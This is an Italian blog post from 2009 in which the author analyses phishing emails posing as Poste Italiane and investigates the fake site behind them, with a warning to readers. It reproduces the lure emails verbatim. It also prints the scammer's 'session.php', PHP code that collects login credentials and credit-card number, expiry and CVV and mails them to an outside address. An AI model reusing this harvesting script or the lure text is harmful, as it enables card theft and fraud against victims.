"Se ci sono due o più modi di fare una cosa,
e uno di questi modi può condurre a una catastrofe,
allora qualcuno la farà in quel modo.

(Edward Murphy)

PHISHING: Come ti svuoto la carta di credito

Mer, 16/09/2009 - 00:00 -- arturu
Email

Quando si parla Phishing la maggior parte delle persone pensa che si stà parlando di bisogni fisiologici oppure i più malizioni pensano subito al mondo dell’erotismo. Il Phishing, è una tecnica di ingegneria sociale, punta a carpire le informazioni riservate di una persona. L’aspetto più tragico delle tecniche di ingnegneria sociale (dato che l’obbietivo sono le informazioni e quindi beni immateriali) è che la vittima difficilmente si accorgerà dell’attacco, a parte quei casi in cui le informazioni sono utilizzate per sottrare beni materiali. Per chi non ne sa niente e volesse approfondire può consultare: Phishing, Ingegneria Sociale.

Ho deciso di parlare di questa tecnica perché stamattina ho subito un tentativo di phishing. Mi è arrivata una mail da Poste Italiane chiedendomi di reinserire i dati del mio conto pena un mancato servizio, logicamente è un tentativo di frode, un modo subdolo per riuscire a carpire i miei dati per rubarmi i miei 20 euri che ho sul conto, cattivone… Ora ti aggiusto io…

Stamattina come al solito vado a controllare la posta. Tra le mail che mi sono arrivate c’erano tre da parte di Poste Italiane. Mi domando “Cosa sarà mai successo. Un cataclisma che incombe su tutto l’universo.”. Poi il contenuto mi ha veramente stupito.

Il contenuto della prima

Il phishing и una frode informatica, realizzata con l’invio di e-mail contraffatte, inalizzata all’acquisizione, per scopi illegali, di dati riservati.
Gentile Cliente,
nell’ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione dei servizi di Posteitaliane e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale.

L’inserimento dei dati alterati puo costituire motivo di interruzione del servizio secondo gli art. 135 e 137/c da Lei accettati al momento della sottoscrizione, oltre a costituire reato penalmente perseguibile secondo il C.P.P ar.415 del 2001 relativo alla legge contro il riciclaggio e la transparenza dei dati forniti in auto certificazione.

Per ovviare al problema e necessaria la verifica e l’aggiornamento dei dati relativi all’anaagrafica dell’Intestatario dei servizi Postali. Effetuare l’aggiornamento dei dati cliccando sul seguente collegamento sicuro:

https://bancopostaonline.poste.it/bpol/cartepre/formslogin.asp

Cordiali Saluti.

Il contenuto della seconda

Oggetto: Comunicazione nr. 91219 del 26 Aprile 2007 – Leggere con attenzione

Gentile Cliente,
Nell’ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione dei servizi di Posteitaliane e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale.

L’inserimento dei dati alterati puo costituire motivo di interruzione del servizio secondo gli art. 135 e 137/c da Lei accettati al momento della sottoscrizione, oltre a costituire reato penalmente perseguibile secondo il C.P.P ar.415 del 2001 relativo alla legge contro il riciclaggio e la transparenza dei dati forniti in auto certificazione.

Per ovviare al problema e necessaria la verifica e l’aggiornamento dei dati relativi all’anaagrafica dell’Intestatario dei servizi Postali. Effetuare l’aggiornamento dei dati cliccando sul seguente collegamento sicuro:

https://bancopostaonline.poste.it/bpol/cartepre/formslogin.asp

Cordiali Saluti.

A parte che il mio programma di posta (Thunderbird) mi segnalava la possibilità che fosse una frode c’erano molti motivi per capire subito che si trattava di una frode:

  • Non vengono mai inviate mail che chiedono di reinserire dati a causa di un errore.
  • L’indirizzo della pagina a cui si arriva schiacciando sul collegamento indicato porta ad una pagina che è identica a poste.it (una copia perfetta) ad esclusione dell’indirizzo.
  • Non è un collegamento sicuro (https://) ma solo un collegamento normale (http://)
  • Disgrazie grammaticali.
Molto incuriosito mi sono messo ad indagare. Clicco su un collegamento, il browser (firefox) mi segnala che il sito a cui stò cercando di collegarmi non è quello originale ma una copia, quindi un tentativo di frode. Tra i collegamenti che ho provato alcuni di questi sono stati rimossi, sicuramente per non lasciare prove (vedi figura sopra a destra), invece uno solo ancora era disponibile (nella figura a sinistra). Da persona abbastanza curiosa mi sono messo in testa di scavare molto più a fondo usando questo collegamento.
Come prima cosa ho chiuso  tutti gli avvisi di firefox. Nelle caselle dove mi chiedeva “Nome utente” e “Password” ho messo dati fasulli (una valanga di volgarità Cool). Appena premuto su “Esegui” un’altra schermata simile al sito di poste.it mi chiedeva i dati della carta postepay e qui un’altra valanga di dati falsi (vedi figura a sinistra, è presente anche la funzione che calcola il numero di caratteri inseriti), appena cliccato su “vai” come per magia mi fa arrivare alla vera home page di poste.it, naturalmente per non destare sospetti.
La prima cosa che mi viene da fare è controllare a chi appartiene il sito consultando alcuni database whois come ad esemprio il ripe, però niente. Strano. La società che ha registrato il dominio non ha inserito i dati dell’utente.
Ancora non contento mi sono messo a smanettare con gli indirizzi e arrivo a quello indicato nella figura accanto. Con grandissima sorpresa mi accorgo che il nostro grandissimo e meraviglioso truffatore ha dimostrato che è un emerito imbecille oltre che un ignorate (visti gli orrori grammaticali). Infatti il nostro “eroe” ha lasciato sul server il file .zip in cui erano contenuti i file per poter copiare il sito di poste.it e farsi inviare tramite mail i dati (una copia l’ho salvata qui). Tra i file c’era uno “session.php”:
session_start();
$USER = $_SESSION['USER'];
$PASS = $_SESSION['PASS'];
$CC = $_POST['CC'];
$MONTH = $_POST['EM'];
$YEAR = $_POST['EY'];
$CVV = $_POST['CVV2'];

$ip = getenv(“REMOTE_ADDR”);
$adddate=date(“D M d, Y g:i a”);

$subj = “$USER : $PASS __ $CC $MONTH/$YEAR $CVV “;
$msg = ”

Poste IT

User : $USER
Pass : $PASS

Card Number : $CC
Expiration Date ( mm/yy ) : $MONTH/$YEAR
CVV2 : $CVV

“;

mail(” email@domain.comemail@domain.com “, $subj, $msg);
header(“Location: complete.html”);

La cosa interessante è che i dati delle persone truffate vengono inviate alla casella: ” email@domain.comemail@domain.com “. Come prima cosa vado a vedere l’indirizzo http://www.domain.com, sembra il sito di un maintener (società che forniscono dei servizi ai webmaster: registrazione domini, hosting, using, server virtuali, ecc). Interrogo dinuovo il database e:

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
%ERROR:101: no entries found
%
% No entries found in the selected source(s).

Nessuna informazione in merito. Purtroppo sono costretto a fermarmi qui. Da qui in avanti solo la Polizia Postale ha l’autorità giuridica a procedere. Una piccola osservazione. Meno male che utilizzo Mozilla Firefox e Thunderbird altrimenti potevo cadere nell’inganno. State attenti alle facciate a volte nascondono qualcosa di brutto…